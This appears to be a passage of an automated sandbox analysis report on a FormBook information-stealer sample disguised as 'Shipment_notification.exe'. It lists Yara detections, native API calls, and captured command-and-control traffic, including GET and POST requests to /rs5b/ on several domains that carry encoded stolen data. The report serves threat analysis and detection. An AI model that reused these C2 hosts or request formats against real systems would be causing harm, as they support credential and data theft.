Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ywtxsm.com
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ywtxsm.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ywtxsm.com/rs5b/Pr
Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno
Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnv
Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnx
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com/rs5b/
Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com/rs5b/1
Source: 10W12dX.4.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 10W12dX.4.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: control.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
Source: unknown DNS traffic detected: queries for: www.emagrecarapido.store
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: Shipment_notification.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7C844 0_2_00A7C844
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7F1E8 0_2_00A7F1E8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 0_2_00A7F1F8 0_2_00A7F1F8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00403853 2_2_00403853
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0042202A 2_2_0042202A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0042309D 2_2_0042309D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004229D0 2_2_004229D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422200 2_2_00422200
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00421A3A 2_2_00421A3A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00401B30 2_2_00401B30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422461 2_2_00422461
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004055AD 2_2_004055AD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004055B3 2_2_004055B3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00421E42 2_2_00421E42
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004206A3 2_2_004206A3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_00422752 2_2_00422752
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004057D3 2_2_004057D3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040BF90 2_2_0040BF90
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040BF93 2_2_0040BF93
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040179B 2_2_0040179B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_004017A0 2_2_004017A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B04120 2_2_01B04120
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEF900 2_2_01AEF900
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B120A0 2_2_01B120A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB20A8 2_2_01BB20A8
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB090 2_2_01AFB090
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1002 2_2_01BA1002
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1EBB0 2_2_01B1EBB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2B28 2_2_01BB2B28
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB22AE 2_2_01BB22AE
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFD5E0 2_2_01AFD5E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE0D20 2_2_01AE0D20
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2D07 2_2_01BB2D07
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1D55 2_2_01BB1D55
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF841F 2_2_01AF841F
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1FF1 2_2_01BB1FF1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB2EF7 2_2_01BB2EF7
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: String function: 01AEB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E5A3 NtCreateFile, 2_2_0041E5A3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E653 NtReadFile, 2_2_0041E653
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E6D3 NtClose, 2_2_0041E6D3
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E783 NtAllocateVirtualMemory, 2_2_0041E783
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E64E NtReadFile, 2_2_0041E64E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E77D NtAllocateVirtualMemory, 2_2_0041E77D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E7FD NtAllocateVirtualMemory, 2_2_0041E7FD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299A0 NtCreateSection,LdrInitializeThunk, 2_2_01B299A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01B29910
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_01B298F0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01B29860
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29840 NtDelayExecution,LdrInitializeThunk, 2_2_01B29840
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A20 NtResumeThread,LdrInitializeThunk, 2_2_01B29A20
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01B29A00
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A50 NtCreateFile,LdrInitializeThunk, 2_2_01B29A50
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295D0 NtClose,LdrInitializeThunk, 2_2_01B295D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29540 NtReadFile,LdrInitializeThunk, 2_2_01B29540
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B297A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_01B297A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01B29780
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01B29FE0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01B29710
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B296E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01B296E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01B29660
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299D0 NtCreateProcessEx, 2_2_01B299D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29950 NtQueueApcThread, 2_2_01B29950
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298A0 NtWriteVirtualMemory, 2_2_01B298A0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29820 NtEnumerateKey, 2_2_01B29820
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2B040 NtSuspendThread, 2_2_01B2B040
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A3B0 NtGetContextThread, 2_2_01B2A3B0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29B00 NtSetValueKey, 2_2_01B29B00
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A80 NtOpenDirectoryObject, 2_2_01B29A80
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A10 NtQuerySection, 2_2_01B29A10
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295F0 NtQueryInformationFile, 2_2_01B295F0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2AD30 NtSetContextThread, 2_2_01B2AD30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29520 NtWaitForSingleObject, 2_2_01B29520
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29560 NtWriteFile, 2_2_01B29560
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29730 NtQueryVirtualMemory, 2_2_01B29730
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A710 NtOpenProcessToken, 2_2_01B2A710
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29770 NtSetInformationFile, 2_2_01B29770
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A770 NtOpenThread, 2_2_01B2A770
